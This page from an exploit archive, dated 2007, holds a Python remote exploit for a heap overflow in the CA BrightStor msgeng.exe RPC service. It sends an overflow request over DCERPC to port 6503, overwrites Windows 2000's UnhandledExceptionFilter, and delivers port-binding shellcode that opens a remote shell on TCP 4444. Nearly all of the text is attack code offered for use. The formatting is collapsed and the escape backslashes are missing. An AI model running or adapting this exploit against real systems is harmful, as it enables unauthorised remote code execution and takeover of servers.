Home / os / solaris

MsgEng.py.txt

Posted on 29 January 2007

#!/usr/bin/python # I couldnt find a reliable exploit for my analysis and so came up with this. # Remote exploit for the CA BrightStor msgeng.exe service heap overflow # vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was # tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard # to port to other platforms. The exploit overwrites the # UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the # address of call dword ptr [esi +4C] located in user32.dll. At the time when # UEF is called esi +4C contains a pointer to our shellcode. # # Winny M Thomas ;-) # Author shall bear no responsibility for any screw ups caused by using this code from impacket.dcerpc import transport, dcerpc from impacket import uuid import struct import sys def DCEconnectAndExploit(target): trans = transport.TCPTransport(target, 6503) trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0'))) request = "A" * 676 request += "x90x90x90x90" request += "x90x90xebx0a" #Call dword ptr [esi +4C] from user32.dll request += struct.pack("<L", 0x77E4FB7A) #Overwrite UnhandledExceptionFilter in Windows 2000 SP0 request += struct.pack("<L", 0x77EE044C) request += "x90x90x90x90" * 2 #Portbinding shellcode; Opens shell on TCP port 4444 request += "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe0" request += "x6fxe3x2ax83xebxfcxe2xf4x1cx05x08x67x08x96x1cxd5" request += "x1fx0fx68x46xc4x4bx68x6fxdcxe4x9fx2fx98x6ex0cxa1" request += "xafx77x68x75xc0x6ex08x63x6bx5bx68x2bx0ex5ex23xb3" request += "x4cxebx23x5exe7xaex29x27xe1xadx08xdexdbx3bxc7x02" request += "x95x8ax68x75xc4x6ex08x4cx6bx63xa8xa1xbfx73xe2xc1" request += "xe3x43x68xa3x8cx4bxffx4bx23x5ex38x4ex6bx2cxd3xa1" request += "xa0x63x68x5axfcxc2x68x6axe8x31x8bxa4xaex61x0fx7a" request += "x1fxb9x85x79x86x07xd0x18x88x18x90x18xbfx3bx1cxfa" request += "x88xa4x0exd6xdbx3fx1cxfcxbfxe6x06x4cx61x82xebx28" request += "xb5x05xe1xd5x30x07x3ax23x15xc2xb4xd5x36x3cxb0x79" request += "xb3x3cxa0x79xa3x3cx1cxfax86x07xf2x76x86x3cx6axcb" request += "x75x07x47x30x90xa8xb4xd5x36x05xf3x7bxb5x90x33x42" request += "x44xc2xcdxc3xb7x90x35x79xb5x90x33x42x05x26x65x63" request += "xb7x90x35x7axb4x3bxb6xd5x30xfcx8bxcdx99xa9x9ax7d" request += "x1fxb9xb6xd5x30x09x89x4ex86x07x80x47x69x8ax89x7a" request += "xb9x46x2fxa3x07x05xa7xa3x02x5ex23xd9x4ax91xa1x07" request += "x1ex2dxcfxb9x6dx15xdbx81x4bxc4x8bx58x1exdcxf5xd5" request += "x95x2bx1cxfcxbbx38xb1x7bxb1x3ex89x2bxb1x3exb6x7b" request += "x1fxbfx8bx87x39x6ax2dx79x1fxb9x89xd5x1fx58x1cxfa" request += "x6bx38x1fxa9x24x0bx1cxfcxb2x90x33x42x10xe5xe7x75" request += "xb3x90x35xd5x30x6fxe3x2a" dce.call(43, request) if __name__ == '__main__': try: target = sys.argv[1] except IndexError: print 'Usage: %s <target ip> ' % sys.argv[0] sys.exit(-1) DCEconnectAndExploit(target)

 

TOP